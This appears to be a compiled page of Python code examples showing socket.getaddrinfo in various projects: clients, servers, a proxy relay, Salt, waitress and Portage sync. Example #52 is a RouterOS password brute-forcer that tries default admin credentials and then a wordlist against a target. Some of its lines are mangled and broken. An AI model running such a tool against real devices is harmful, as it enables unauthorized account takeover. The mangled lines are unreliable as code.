    # parses the current base url unpacking it into the host
    # and part components to be used in the connection
    parse = urlparse.urlparse(BASE_URL)
    host = parse.hostname
    port = parse.port

    # tries to resolve the provided address into defined
    # address for the provided types (tcp)
    results = socket.getaddrinfo(host, port, socket.AF_UNSPEC,
                                 socket.SOCK_STREAM)

    # iterates over all the resolution results to try
    # to create and connect to an associated socket
    for result in results:
        # unpacks the current result into the appropriate
        # parts to be used in the socket creation
        af, socktype, proto, _canon, address = result

        # creates the socket object from the (unpacked) results
        # of the resolution
        try:
            _socket = socket.socket(af, socktype, proto)
        except socket.error:
            _socket = None
            continue

        # tries to connect to the remote host, in case there's
        # an error closes the socket sets it as invalid and continues
        # the current loop (tries again)
        try:
            _socket.connect(address)
        except socket.error:
            _socket.close()
            _socket = None
            continue

        # in case this point is reached a correct connection
        # was established, no need to continues the loop
        break

    # in case no socket was created must raise an exception
    # indicating the problem
    if _socket is None: raise RuntimeError("Socket creation was not possible")

    # creates the "final" post message to be sent to the server
    # using the currently set username and password values
    data = COOKIE_DATA % (USERNAME, PASSWORD)
    message = COOKIE_MESSAGE % (len(data), data)

    # sends the "final" message to the server and then waits
    # for the response value from it
    _socket.sendall(message)
    data = []
    while True:
        _data = _socket.recv(1024)
        if not _data: break
        data.append(_data)

    # closes the socket no need for it to remain open (no
    # more data to be transmitted)
    _socket.close()

    # in case no data was received must return an invalid
    # cookie value immediately
    if not data: return None

    # joins the complete set of data for the response and
    # then splits the response into various lines
    response = "".join(data)
    lines = response.split("\n")
    headers = lines[1:]

    # starts the cookie value as unset, this is the default
    # value to be used in case it's not found
    cookie = None

    # iterates over the complete set of headers to try to find
    # the set cookie header and retrieve its value
    for header in headers:
        header_s = header.strip().split(":", 1)
        if len(header_s) == 1: continue
        name, value = header_s
        if not name == "Set-Cookie": continue
        cookie = value.strip()

    # prints a message indicating the finding of the cookie value
    # and returns the string containing it
    log("Cookie", "authentication cookie received '%s'" % cookie)
    return cookie
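The resolve-and-connect loop in get_cookie() is the same pattern the standard library packages up as socket.create_connection(); a minimal sketch of the hand-rolled version, with illustrative names and timeout, could look like this:

import socket

def open_connection(host, port, timeout=10.0):
    # Try each getaddrinfo() result until one socket connects.
    last_error = None
    for af, socktype, proto, _canon, address in socket.getaddrinfo(
            host, port, socket.AF_UNSPEC, socket.SOCK_STREAM):
        sock = None
        try:
            sock = socket.socket(af, socktype, proto)
            sock.settimeout(timeout)
            sock.connect(address)
            return sock
        except OSError as exc:
            last_error = exc
            if sock is not None:
                sock.close()
    raise RuntimeError("Socket creation was not possible") from last_error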
Example #48
0
    def __init__(self,
                 config,
                 dns_resolver,
                 is_local,
                 stat_callback=None,
                 stat_counter=None):
        self._config = config
        if config.get('connect_verbose_info', 0) > 0:
            common.connect_log = logging.info

        if config.get('connect_hex_data', 0) > 0:
            self._connect_hex_data = True
        else:
            self._connect_hex_data = False

        if is_local:
            self._listen_addr = config['local_address']
            self._listen_port = config['local_port']
            self._remote_addr = config['server']
            self._remote_port = config['server_port']
        else:
            self._listen_addr = config['server']
            self._listen_port = config['server_port']
            self._remote_addr = None
            self._remote_port = None
        self._dns_resolver = dns_resolver
        self._password = common.to_bytes(config['password'])
        self._method = config['method']
        self._timeout = config['timeout']
        self._is_local = is_local
        self._udp_cache_size = config['udp_cache']
        self._cache = lru_cache.LRUCache(
            timeout=config['udp_timeout'],
            close_callback=self._close_client_pair)
        self._cache_dns_client = lru_cache.LRUCache(
            timeout=10, close_callback=self._close_client_pair)
        self._client_fd_to_server_addr = {}
        #self._dns_cache = lru_cache.LRUCache(timeout=1800)
        self._eventloop = None
        self._closed = False
        self.server_transfer_ul = 0
        self.server_transfer_dl = 0

        self.connected_iplist = []
        self.wrong_iplist = {}
        self.detect_log_list = []

        self.is_cleaning_connected_iplist = False
        self.is_cleaning_wrong_iplist = False
        self.is_cleaning_detect_log = False
        self.is_cleaning_mu_detect_log_list = False
        self.is_cleaning_mu_connected_iplist = False

        if 'users_table' in self._config:
            self.multi_user_table = self._config['users_table']

        self.mu_server_transfer_ul = {}
        self.mu_server_transfer_dl = {}
        self.mu_connected_iplist = {}
        self.mu_detect_log_list = {}

        self.is_pushing_detect_hex_list = False
        self.is_pushing_detect_text_list = False
        self.detect_hex_list = self._config['detect_hex_list'].copy()
        self.detect_text_list = self._config['detect_text_list'].copy()

        self.protocol_data = obfs.obfs(config['protocol']).init_data()
        self._protocol = obfs.obfs(config['protocol'])
        server_info = obfs.server_info(self.protocol_data)
        server_info.host = self._listen_addr
        server_info.port = self._listen_port
        if 'users_table' in self._config:
            server_info.users = self.multi_user_table
        else:
            server_info.users = {}
        server_info.is_multi_user = config["is_multi_user"]
        server_info.protocol_param = config['protocol_param']
        server_info.obfs_param = ''
        server_info.iv = b''
        server_info.recv_iv = b''
        server_info.key_str = common.to_bytes(config['password'])
        server_info.key = encrypt.encrypt_key(self._password, self._method)
        server_info.head_len = 30
        server_info.tcp_mss = 1452
        server_info.buffer_size = BUF_SIZE
        server_info.overhead = 0
        self._protocol.set_server_info(server_info)

        self._sockets = set()
        self._fd_to_handlers = {}
        self._reqid_to_hd = {}
        self._data_to_write_to_server_socket = []

        self._timeouts = []  # a list for all the handlers
        # we trim the timeouts once a while
        self._timeout_offset = 0  # last checked position for timeout
        self._handler_to_timeouts = {}  # key: handler value: index in timeouts

        self._bind = config.get('out_bind', '')
        self._bindv6 = config.get('out_bindv6', '')
        self._ignore_bind_list = config.get('ignore_bind', [])

        if 'forbidden_ip' in config:
            self._forbidden_iplist = IPNetwork(config['forbidden_ip'])
        else:
            self._forbidden_iplist = None
        if 'forbidden_port' in config:
            self._forbidden_portset = PortRange(config['forbidden_port'])
        else:
            self._forbidden_portset = None
        if 'disconnect_ip' in config:
            self._disconnect_ipset = config['disconnect_ip'].split(',')
        else:
            self._disconnect_ipset = None

        self._relay_rules = self._config['relay_rules'].copy()
        self._is_pushing_relay_rules = False

        addrs = socket.getaddrinfo(self._listen_addr, self._listen_port, 0,
                                   socket.SOCK_DGRAM, socket.SOL_UDP)
        if len(addrs) == 0:
            raise Exception("can't get addrinfo for %s:%d" %
                            (self._listen_addr, self._listen_port))
        af, socktype, proto, canonname, sa = addrs[0]
        server_socket = socket.socket(af, socktype, proto)
        server_socket.bind((self._listen_addr, self._listen_port))
        server_socket.setblocking(False)
        self._server_socket = server_socket
        self._stat_callback = stat_callback
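The constructor above keeps only the first getaddrinfo() result when binding its UDP server socket; a stripped-down sketch of that step (the helper name is illustrative), binding to the resolved sockaddr rather than re-passing the host string:

import socket

def bind_udp(listen_addr, listen_port):
    # Resolve the listen address for UDP and bind a non-blocking socket.
    addrs = socket.getaddrinfo(listen_addr, listen_port, 0,
                               socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    if not addrs:
        raise OSError("can't get addrinfo for %s:%d" % (listen_addr, listen_port))
    af, socktype, proto, _canon, sa = addrs[0]
    sock = socket.socket(af, socktype, proto)
    sock.bind(sa)
    sock.setblocking(False)
    return sock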
Example #49
0
    # (Assumed context, not shown in the original fragment: the remote host was
    # resolved first and only the first usable result is kept; host and port are
    # placeholders for whatever the enclosing function received.)
    addrinfo = None
    for res in socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM):
        # res is a (family, socktype, proto, canonname, sockaddr) tuple
        addrinfo = res
        break
    try:
        sock = socket.socket(addrinfo[0], addrinfo[1], addrinfo[2])
    except socket.error:
        print('failed to create socket')
        sock = None
    if sock is not None:
        try:
            myaddrinfo = None
            # Pick a wildcard local address of the same family to bind to.
            # Note: AI_* constants are bit flags and must be combined with "|";
            # the original fragment used "or", which keeps only AI_PASSIVE.
            for res in socket.getaddrinfo(None, 0, addrinfo[0], addrinfo[1], 0,
                                          socket.AI_PASSIVE | socket.AI_NUMERICSERV):
                myaddrinfo = res
                break
            sock.bind(myaddrinfo[4])
            sock.connect(addrinfo[4])
        except socket.error as msg:
            print('failed to bind and connect:', msg)
            sock.close()
            sock = None

    if sock is None:
        print('could not open socket')
    return sock
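A quick demonstration of why the AI_* flags must be OR-ed bitwise rather than combined with the boolean "or" (the printed values are typical of a Linux build and may differ on other platforms):

import socket

# Boolean `or` short-circuits to the first truthy value; bit flags need `|`.
assert (socket.AI_PASSIVE or socket.AI_NUMERICSERV) == socket.AI_PASSIVE
flags = socket.AI_PASSIVE | socket.AI_NUMERICSERV
local = socket.getaddrinfo(None, 0, socket.AF_INET, socket.SOCK_STREAM, 0, flags)[0]
print(local[4])   # typically ('0.0.0.0', 0)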
Example #50
0
#!/usr/bin/python

# Echo server program
import socket
import sys

HOST = None  # Symbolic name meaning all available interfaces
PORT = 50007  # Arbitrary non-privileged port
s = None
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM,
                              0, socket.AI_PASSIVE):
    af, socktype, proto, canonname, sa = res
    try:
        s = socket.socket(af, socktype, proto)
    except socket.error as msg:
        s = None
        continue
    try:
        s.bind(sa)
        s.listen(1)
    except socket.error as msg:
        s.close()
        s = None
        continue
    break
if s is None:
    print('could not open socket')
    sys.exit(1)
while 1:
    conn, addr = s.accept()
    print('Connected by', addr)
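    # (Reconstructed continuation -- the original listing stops right after
    # accept(); the canonical echo server serves the connection roughly like this.)
    with conn:
        while True:
            data = conn.recv(1024)
            if not data:
                break
            conn.sendall(data)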
Example #51
0
def connect(host, port=None, **kwargs):
    '''
    Test connectivity to a host using a particular
    port from the minion.

    .. versionadded:: 2014.7

    CLI Example:

    .. code-block:: bash

        salt '*' network.connect archlinux.org 80

        salt '*' network.connect archlinux.org 80 timeout=3

        salt '*' network.connect archlinux.org 80 timeout=3 family=ipv4

        salt '*' network.connect google-public-dns-a.google.com port=53 proto=udp timeout=3
    '''

    ret = {'result': None,
           'comment': ''}

    if not host:
        ret['result'] = False
        ret['comment'] = 'Required argument, host, is missing.'
        return ret

    if not port:
        ret['result'] = False
        ret['comment'] = 'Required argument, port, is missing.'
        return ret

    proto = kwargs.get('proto', 'tcp')
    timeout = kwargs.get('timeout', 5)
    family = kwargs.get('family', None)

    if salt.utils.validate.net.ipv4_addr(host) or salt.utils.validate.net.ipv6_addr(host):
        address = host
    else:
        address = '{0}'.format(salt.utils.network.sanitize_host(host))

    try:
        if proto == 'udp':
            __proto = socket.SOL_UDP
        else:
            __proto = socket.SOL_TCP
            proto = 'tcp'

        if family:
            if family == 'ipv4':
                __family = socket.AF_INET
            elif family == 'ipv6':
                __family = socket.AF_INET6
            else:
                __family = 0
        else:
            __family = 0

        (family,
         socktype,
         _proto,
         garbage,
         _address) = socket.getaddrinfo(address, port, __family, 0, __proto)[0]

        skt = socket.socket(family, socktype, _proto)
        skt.settimeout(timeout)

        if proto == 'udp':
            # Generate a random string of a
            # decent size to test UDP connection
            md5h = hashlib.md5()
            md5h.update(datetime.datetime.now().strftime('%s').encode())
            msg = md5h.hexdigest()
            skt.sendto(msg.encode(), _address)
            recv, svr = skt.recvfrom(255)
            skt.close()
        else:
            skt.connect(_address)
            skt.shutdown(2)
    except Exception as exc:
        ret['result'] = False
        try:
            errno, errtxt = exc.args
        except (TypeError, ValueError):
            ret['comment'] = 'Unable to connect to {0} ({1}) on {2} port {3}'.format(host, _address[0], proto, port)
        else:
            ret['comment'] = '{0}'.format(errtxt)
        return ret

    ret['result'] = True
    ret['comment'] = 'Successfully connected to {0} ({1}) on {2} port {3}'.format(host, _address[0], proto, port)
    return ret
Example #52
0
def main():
    print(banner)
    try:
        opts, args = getopt.getopt(sys.argv[1:], "ht:p:u:d:s:q", [
            "help", "target=", "port=", "user="******"dictionary=", "seconds=",
            "quiet"
        ])
    except getopt.GetoptError as err:
        error(err)
        sys.exit(2)

    if not opts:
        error("ERROR: You must specify at least a Target and a Dictionary")
        sys.exit(2)

    target = None
    port = None
    user = None
    dictionary = None
    quietmode = False
    seconds = None

    for opt, arg in opts:
        if opt in ("-h", "--help"):
            usage()
            sys.exit(0)
        elif opt in ("-t", "--target"):
            target = arg
        elif opt in ("-p", "--port"):
            port = arg
        elif opt in ("-u", "--user"):
            user = arg
        elif opt in ("-d", "--dictionary"):
            dictionary = arg
        elif opt in ("-s", "--seconds"):
            seconds = arg
        elif opt in ("-q", "--quiet"):
            quietmode = True
        else:
            assert False, "error"
            sys.exit(2)

    if not target:
        error("ERROR: You must specify a Target")
        sys.exit(2)
    if not dictionary:
        error("ERROR: You must specify a Dictionary")
        sys.exit(2)
    if not port:
        port = 8728
    if not user:
        user = '******'
    if not seconds:
        seconds = 1

    print("[*] Starting bruteforce attack...")
    print("-" * 33)

    # Catch KeyboardInterrupt
    signal.signal(signal.SIGINT, signal_handler)

    # Looking for default RouterOS creds
    defcredcheck = True

    # Get the number of lines in file
    count = 0
    dictFile = codecs.open(dictionary, 'rb', encoding='utf-8', errors='ignore')
    while 1:
        buffer = dictFile.read(8192 * 1024)
        if not buffer: break
        count += buffer.count('\n')
    dictFile.seek(0)

    items = 1
    for password in dictFile.readlines():
        password = password.strip('\n\r ')
        s = None
        for res in socket.getaddrinfo(target, port, socket.AF_UNSPEC,
                                      socket.SOCK_STREAM):
            af, socktype, proto, canonname, sa = res
            try:
                s = socket.socket(af, socktype, proto)
                # Timeout threshold = 5 secs
                s.settimeout(5)
            except (socket.error):
                s = None
                continue
            try:
                s.connect(sa)
            except (socket.timeout):
                print("[-] Target timed out! Exiting...")
                s.close()
                sys.exit(1)
            except (socket.error):
                print(
                    "[-] SOCKET ERROR! Check Target (IP or PORT parameters). Exiting..."
                )
                s.close()
                sys.exit(1)
        dictFile.close()
        apiros = ApiRos(s)

        # First of all, we'll try with RouterOS default credentials ("admin":"")
        while defcredcheck:
            defaultcreds = apiros.login("admin", "")
            login = ''.join(defaultcreds[0][0])

            print("[-] Trying with default credentials on RouterOS...")
            print()

            if login == "!done":
                print(
                    "[+] Login successful!!! Default RouterOS credentials were not changed. Log in with admin:<BLANK>"
                )
                sys.exit(0)
            else:
                print(
                    "[-] Default RouterOS credentials were unsuccessful, trying with "
                    + str(count) + " passwords in list...")
                print("")
                defcredcheck = False
                time.sleep(1)

        loginoutput = apiros.login(user, password)
        login = ''.join(loginoutput[0][0])

        if not quietmode:
            print("[-] Trying " + str(items) + " of " + str(count) +
                  " Paswords - Current: " + password)

        if login == "!done":
            print("[+] Login successful!!! User: "******" Password: "******"[*] ATTACK FINISHED! No suitable credentials were found. Try again with a different wordlist."
    )
    run(count)
Example #53
0
def _a_lookup(hostname: str) -> List[str]:
    return [addressinfo[4][0]
            for addressinfo in socket.getaddrinfo(hostname, 25)]
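Note that without a family argument the lookup above returns AAAA results alongside A records, usually duplicated once per socket type; restricting and de-duplicating, under the same assumptions, might look like:

import socket
from typing import List

def _a_lookup_v4(hostname: str) -> List[str]:
    # Only IPv4, one entry per distinct address.
    return sorted({info[4][0]
                   for info in socket.getaddrinfo(hostname, 25, socket.AF_INET,
                                                  socket.SOCK_STREAM)})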
Example #54
0
import socket
import sys

PORT = 3000

infos = socket.getaddrinfo('127.0.0.1', PORT)

stream_info = [i for i in infos if i[1] == socket.SOCK_STREAM][0]

client = socket.socket(*stream_info[:3])

client.connect(stream_info[-1])

message = str(sys.argv[1])

client.sendall(message.encode('utf8'))

buffer_length = 8

message_complete = False

server_message = b''  # recv() returns bytes, so accumulate bytes before decoding

while not message_complete:
    part = client.recv(buffer_length)
    server_message += part
    if len(part) < buffer_length:
        break

server_message = server_message.decode('utf8')
print(server_message)
Example #55
0
def get_hostname():
    return socket.getaddrinfo(
        socket.gethostname(), 0, 0, 0, 0, socket.AI_CANONNAME)[0][3]
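For the common case, socket.getfqdn() gives a result comparable to the AI_CANONNAME lookup above; a small comparison sketch (the output depends entirely on the local resolver configuration):

import socket

canonical = socket.getaddrinfo(
    socket.gethostname(), 0, 0, 0, 0, socket.AI_CANONNAME)[0][3]
print(canonical, socket.getfqdn())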
Example #56
0
		while True:
			led = urandom.getrandbits(4) % numLEDs
			np.fill((0,0,0))
			for i in range(-255, 255, 10):                                                                                                            
				np[led] = (abs(i),abs(i),abs(i))                                                                                                    
				np.write()                                                                                                                            
				time.sleep(0.02)
	elif(r.startswith("/CLEAR")):
		np.fill((0,0,0))
		np.write()
	elif(r.startswith("/TEST")):
		np[1] = (urandom.getrandbits(8), urandom.getrandbits(8), urandom.getrandbits(8))
		np.write()


addr = socket.getaddrinfo('0.0.0.0', 8080)[0][-1]
s = socket.socket()
s.bind(addr)
s.listen(1)

while True:
	text = ''
	cl, addr = s.accept()
	cl_file = cl.makefile('rwb', 0)
	while True:
		line = str(cl_file.readline(), 'utf8')
		if not line or not line.startswith("GET"):
			break
		print((addr[0], line))
		req = line.split()[1]
		handleREQ(req)
Example #57
0
    def __init__(self,
                 hub,
                 name=None,
                 description=None,
                 metadata=None,
                 addr=None,
                 port=0,
                 https=False,
                 key_file=None,
                 cert_file=None,
                 cert_reqs=0,
                 ca_certs=None,
                 ssl_version=None,
                 callable=True):

        # GENERAL
        self._is_running = False
        self._is_registered = False

        if metadata is None:
            metadata = {}

        if name is not None:
            metadata["samp.name"] = name

        if description is not None:
            metadata["samp.description.text"] = description

        self._metadata = metadata

        self._addr = addr
        self._port = port
        self._xmlrpcAddr = None
        self._callable = callable

        # HUB INTERACTION
        self.client = None
        self._public_id = None
        self._private_key = None
        self._hub_id = None
        self._notification_bindings = {}
        self._call_bindings = {
            "samp.app.ping": [self._ping, {}],
            "client.env.get": [self._client_env_get, {}]
        }
        self._response_bindings = {}

        self._host_name = "127.0.0.1"
        if internet_on():
            try:
                self._host_name = socket.getfqdn()
                socket.getaddrinfo(self._addr or self._host_name, self._port
                                   or 0)
            except socket.error:
                self._host_name = "127.0.0.1"

        self.hub = hub

        if self._callable:

            self._thread = threading.Thread(target=self._serve_forever)
            self._thread.daemon = True

            if SSL_SUPPORT and https:
                self.client = SecureXMLRPCServer(
                    (self._addr or self._host_name, self._port),
                    key_file,
                    cert_file,
                    cert_reqs,
                    ca_certs,
                    ssl_version,
                    log,
                    logRequests=False,
                    allow_none=True)
            else:
                self.client = ThreadingXMLRPCServer(
                    (self._addr or self._host_name, self._port),
                    logRequests=False,
                    allow_none=True)

            self.client.register_introspection_functions()
            self.client.register_function(self.receive_notification,
                                          'samp.client.receiveNotification')
            self.client.register_function(self.receive_call,
                                          'samp.client.receiveCall')
            self.client.register_function(self.receive_response,
                                          'samp.client.receiveResponse')

            # If the port was set to zero, then the operating system has
            # selected a free port. We now check what this port number is.
            if self._port == 0:
                self._port = self.client.socket.getsockname()[1]

            if SSL_SUPPORT and https:
                protocol = 'https'
            else:
                protocol = 'http'

            self._xmlrpcAddr = urlunparse(
                (protocol, '{0}:{1}'.format(self._addr or self._host_name,
                                            self._port), '', '', '', ''))
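The host-name probe near the top of the constructor simply checks whether the chosen name resolves at all and falls back to 127.0.0.1 when it does not; a minimal standalone sketch of that check (the function name is illustrative):

import socket

def resolvable_host(preferred=None, port=0):
    # Return the preferred name if it resolves, else fall back to loopback.
    candidate = preferred or socket.getfqdn()
    try:
        socket.getaddrinfo(candidate, port)
    except socket.error:
        return "127.0.0.1"
    return candidate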
Example #58
0
    sys.stdout.flush()
    if False:
        logger.info('checking dns for instances')
        nChecked = 0
        badGais = []
        for inst in checkedInstances:
            if inst['state'] == 'checked':
                nChecked += 1
                iid = inst['_id']
                abbrevIid = iid[0:16]
                #logger.info( 'checking dns for %s', abbrevIid )
                host = inst['ssh']['host']
                port = inst['ssh']['port']
                try:
                    info = socket.getaddrinfo(host, port)
                except Exception as exc:
                    logger.warning('gai failed for host "%s", port %d, %s',
                                   host, port, iid)
                    logger.warning('error (%d) %s', exc.errno, exc)
                    if exc.errno != socket.EAI_NONAME:
                        logger.warning('(unusual error)')
                    badGais.append((inst, exc))
        logger.info('%d bad gai out of %d checked', len(badGais), nChecked)
    # collect ram totals
    #ramByDevId = {}
    #for inst in startedInstances:
    #    ramByDevId[ inst['device-id'] ] = inst['ram']['total'] / 1000000
    lowRiders = checkedInstancesDf[(checkedInstancesDf.dpr < 39)
                                   & (checkedInstancesDf.dpr >= 24)]
Example #59
0
    def __init__(self, **kw):

        if 'listen' in kw and ('host' in kw or 'port' in kw):
            raise ValueError(
                'host and or port may not be set if listen is set.')

        for k, v in kw.items():
            if k not in self._param_map:
                raise ValueError('Unknown adjustment %r' % k)
            setattr(self, k, self._param_map[k](v))

        if (not isinstance(self.host, _str_marker)
                or not isinstance(self.port, _int_marker)):
            self.listen = ['{}:{}'.format(self.host, self.port)]

        enabled_families = socket.AF_UNSPEC

        if self.ipv4 and not self.ipv6:
            enabled_families = socket.AF_INET

        if not self.ipv4 and self.ipv6:
            enabled_families = socket.AF_INET6

        wanted_sockets = []
        hp_pairs = []
        for i in self.listen:
            if ':' in i:
                (host, port) = i.rsplit(":", 1)

                # IPv6 we need to make sure that we didn't split on the address
                if ']' in port:  # pragma: nocover
                    (host, port) = (i, str(self.port))
            else:
                (host, port) = (i, str(self.port))

            try:
                if '[' in host and ']' in host:  # pragma: nocover
                    host = host.strip('[').rstrip(']')

                if host == '*':
                    host = None

                for s in socket.getaddrinfo(host, port, enabled_families,
                                            socket.SOCK_STREAM,
                                            socket.IPPROTO_TCP,
                                            socket.AI_PASSIVE):
                    (family, socktype, proto, _, sockaddr) = s

                    # It seems that getaddrinfo() may sometimes happily return
                    # the same result multiple times, this of course makes
                    # bind() very unhappy...
                    #
                    # Split on %, and drop the zone-index from the host in the
                    # sockaddr. Works around a bug in OS X whereby
                    # getaddrinfo() returns the same link-local interface with
                    # two different zone-indices (which makes no sense what so
                    # ever...) yet treats them equally when we attempt to bind().
                    if (sockaddr[1] == 0 or (sockaddr[0].split(
                            '%', 1)[0], sockaddr[1]) not in hp_pairs):
                        wanted_sockets.append(
                            (family, socktype, proto, sockaddr))
                        hp_pairs.append((sockaddr[0].split('%',
                                                           1)[0], sockaddr[1]))
            except:
                raise ValueError('Invalid host/port specified.')

        self.listen = wanted_sockets
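The dedupe logic above guards against getaddrinfo() handing back the same (host, port) pair more than once; its core, including the zone-index strip, can be sketched as (helper name is illustrative):

import socket

def unique_bind_addresses(host, port):
    # Keep the first occurrence of each (address, port) pair.
    seen, wanted = set(), []
    for family, socktype, proto, _canon, sockaddr in socket.getaddrinfo(
            host, port, socket.AF_UNSPEC, socket.SOCK_STREAM,
            socket.IPPROTO_TCP, socket.AI_PASSIVE):
        key = (sockaddr[0].split('%', 1)[0], sockaddr[1])
        if key not in seen:
            seen.add(key)
            wanted.append((family, socktype, proto, sockaddr))
    return wanted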
Example #60
0
    def update(self):
        '''Internal update function which performs the transfer'''
        opts = self.options.get('emerge_config').opts
        self.usersync_uid = self.options.get('usersync_uid', None)
        enter_invalid = '--ask-enter-invalid' in opts
        quiet = '--quiet' in opts
        out = portage.output.EOutput(quiet=quiet)
        syncuri = self.repo.sync_uri
        if self.repo.module_specific_options.get('sync-rsync-vcs-ignore',
                                                 'false').lower() == 'true':
            vcs_dirs = ()
        else:
            vcs_dirs = frozenset(VCS_DIRS)
            vcs_dirs = vcs_dirs.intersection(os.listdir(self.repo.location))

        for vcs_dir in vcs_dirs:
            writemsg_level(("!!! %s appears to be under revision " + \
             "control (contains %s).\n!!! Aborting rsync sync "
             "(override with \"sync-rsync-vcs-ignore = true\" in repos.conf).\n") % \
             (self.repo.location, vcs_dir), level=logging.ERROR, noiselevel=-1)
            return (1, False)
        self.timeout = 180

        rsync_opts = []
        if self.settings["PORTAGE_RSYNC_OPTS"] == "":
            rsync_opts = self._set_rsync_defaults()
        else:
            rsync_opts = self._validate_rsync_opts(rsync_opts, syncuri)
        self.rsync_opts = self._rsync_opts_extend(opts, rsync_opts)

        self.extra_rsync_opts = list()
        if self.repo.module_specific_options.get('sync-rsync-extra-opts'):
            self.extra_rsync_opts.extend(
                portage.util.shlex_split(
                    self.repo.module_specific_options['sync-rsync-extra-opts'])
            )

        # Process GLEP74 verification options.
        # Default verification to 'no'; it's enabled for ::gentoo
        # via default repos.conf though.
        self.verify_metamanifest = (self.repo.module_specific_options.get(
            'sync-rsync-verify-metamanifest', 'no') in ('yes', 'true'))
        # Support overriding job count.
        self.verify_jobs = self.repo.module_specific_options.get(
            'sync-rsync-verify-jobs', None)
        if self.verify_jobs is not None:
            try:
                self.verify_jobs = int(self.verify_jobs)
                if self.verify_jobs < 0:
                    raise ValueError(self.verify_jobs)
            except ValueError:
                writemsg_level(
                    "!!! sync-rsync-verify-jobs not a positive integer: %s\n" %
                    (self.verify_jobs, ),
                    level=logging.WARNING,
                    noiselevel=-1)
                self.verify_jobs = None
            else:
                if self.verify_jobs == 0:
                    # Use the apparent number of processors if gemato
                    # supports it.
                    self.verify_jobs = None
        # Support overriding max age.
        self.max_age = self.repo.module_specific_options.get(
            'sync-rsync-verify-max-age', '')
        if self.max_age:
            try:
                self.max_age = int(self.max_age)
                if self.max_age < 0:
                    raise ValueError(self.max_age)
            except ValueError:
                writemsg_level(
                    "!!! sync-rsync-max-age must be a non-negative integer: %s\n"
                    % (self.max_age, ),
                    level=logging.WARNING,
                    noiselevel=-1)
                self.max_age = 0
        else:
            self.max_age = 0

        openpgp_env = None
        if self.verify_metamanifest and gemato is not None:
            # Use isolated environment if key is specified,
            # system environment otherwise
            if self.repo.sync_openpgp_key_path is not None:
                openpgp_env = gemato.openpgp.OpenPGPEnvironment()
            else:
                openpgp_env = gemato.openpgp.OpenPGPSystemEnvironment()

        try:
            # Load and update the keyring early. If it fails, then verification
            # will not be performed and the user will have to fix it and try again,
            # so we may as well bail out before actual rsync happens.
            if openpgp_env is not None and self.repo.sync_openpgp_key_path is not None:

                try:
                    out.einfo('Using keys from %s' %
                              (self.repo.sync_openpgp_key_path, ))
                    with io.open(self.repo.sync_openpgp_key_path, 'rb') as f:
                        openpgp_env.import_key(f)
                    out.ebegin('Refreshing keys from keyserver')
                    retry_decorator = self._key_refresh_retry_decorator()
                    if retry_decorator is None:
                        openpgp_env.refresh_keys()
                    else:

                        def noisy_refresh_keys():
                            """
							Since retry does not help for some types of
							errors, display errors as soon as they occur.
							"""
                            try:
                                openpgp_env.refresh_keys()
                            except Exception as e:
                                writemsg_level("%s\n" % (e, ),
                                               level=logging.ERROR,
                                               noiselevel=-1)
                                raise  # retry

                        # The ThreadPoolExecutor that asyncio uses by default
                        # does not support cancellation of tasks, therefore
                        # use ForkExecutor for task cancellation support, in
                        # order to enforce timeouts.
                        loop = global_event_loop()
                        with ForkExecutor(loop=loop) as executor:
                            func_coroutine = functools.partial(
                                loop.run_in_executor, executor,
                                noisy_refresh_keys)
                            decorated_func = retry_decorator(func_coroutine,
                                                             loop=loop)
                            loop.run_until_complete(decorated_func())
                    out.eend(0)
                except (GematoException, asyncio.TimeoutError) as e:
                    writemsg_level(
                        "!!! Manifest verification impossible due to keyring problem:\n%s\n"
                        % (e, ),
                        level=logging.ERROR,
                        noiselevel=-1)
                    return (1, False)

            # Real local timestamp file.
            self.servertimestampfile = os.path.join(self.repo.location,
                                                    "metadata",
                                                    "timestamp.chk")

            content = portage.util.grabfile(self.servertimestampfile)
            timestamp = 0
            if content:
                try:
                    timestamp = time.mktime(
                        time.strptime(content[0], TIMESTAMP_FORMAT))
                except (OverflowError, ValueError):
                    pass
            del content

            try:
                self.rsync_initial_timeout = \
                 int(self.settings.get("PORTAGE_RSYNC_INITIAL_TIMEOUT", "15"))
            except ValueError:
                self.rsync_initial_timeout = 15

            try:
                maxretries = int(self.settings["PORTAGE_RSYNC_RETRIES"])
            except SystemExit as e:
                raise  # Needed else can't exit
            except:
                maxretries = -1  #default number of retries

            if syncuri.startswith("file://"):
                self.proto = "file"
                dosyncuri = syncuri[7:]
                unchanged, is_synced, exitcode, updatecache_flg = self._do_rsync(
                    dosyncuri, timestamp, opts)
                self._process_exitcode(exitcode, dosyncuri, out, 1)
                return (exitcode, updatecache_flg)

            retries = 0
            try:
                self.proto, user_name, hostname, port = re.split(
                    r"(rsync|ssh)://([^:/]+@)?(\[[:\da-fA-F]*\]|[^:/]*)(:[0-9]+)?",
                    syncuri,
                    maxsplit=4)[1:5]
            except ValueError:
                writemsg_level("!!! sync-uri is invalid: %s\n" % syncuri,
                               noiselevel=-1,
                               level=logging.ERROR)
                return (1, False)

            self.ssh_opts = self.settings.get("PORTAGE_SSH_OPTS")

            if port is None:
                port = ""
            if user_name is None:
                user_name = ""
            if re.match(r"^\[[:\da-fA-F]*\]$", hostname) is None:
                getaddrinfo_host = hostname
            else:
                # getaddrinfo needs the brackets stripped
                getaddrinfo_host = hostname[1:-1]
            updatecache_flg = False
            all_rsync_opts = set(self.rsync_opts)
            all_rsync_opts.update(self.extra_rsync_opts)

            family = socket.AF_UNSPEC
            if "-4" in all_rsync_opts or "--ipv4" in all_rsync_opts:
                family = socket.AF_INET
            elif socket.has_ipv6 and \
             ("-6" in all_rsync_opts or "--ipv6" in all_rsync_opts):
                family = socket.AF_INET6

            addrinfos = None
            uris = []

            try:
                addrinfos = getaddrinfo_validate(
                    socket.getaddrinfo(getaddrinfo_host, None, family,
                                       socket.SOCK_STREAM))
            except socket.error as e:
                writemsg_level("!!! getaddrinfo failed for '%s': %s\n" %
                               (_unicode_decode(hostname), _unicode(e)),
                               noiselevel=-1,
                               level=logging.ERROR)

            if addrinfos:

                AF_INET = socket.AF_INET
                AF_INET6 = None
                if socket.has_ipv6:
                    AF_INET6 = socket.AF_INET6

                ips_v4 = []
                ips_v6 = []

                for addrinfo in addrinfos:
                    if addrinfo[0] == AF_INET:
                        ips_v4.append("%s" % addrinfo[4][0])
                    elif AF_INET6 is not None and addrinfo[0] == AF_INET6:
                        # IPv6 addresses need to be enclosed in square brackets
                        ips_v6.append("[%s]" % addrinfo[4][0])

                random.shuffle(ips_v4)
                random.shuffle(ips_v6)

                # Give priority to the address family that
                # getaddrinfo() returned first.
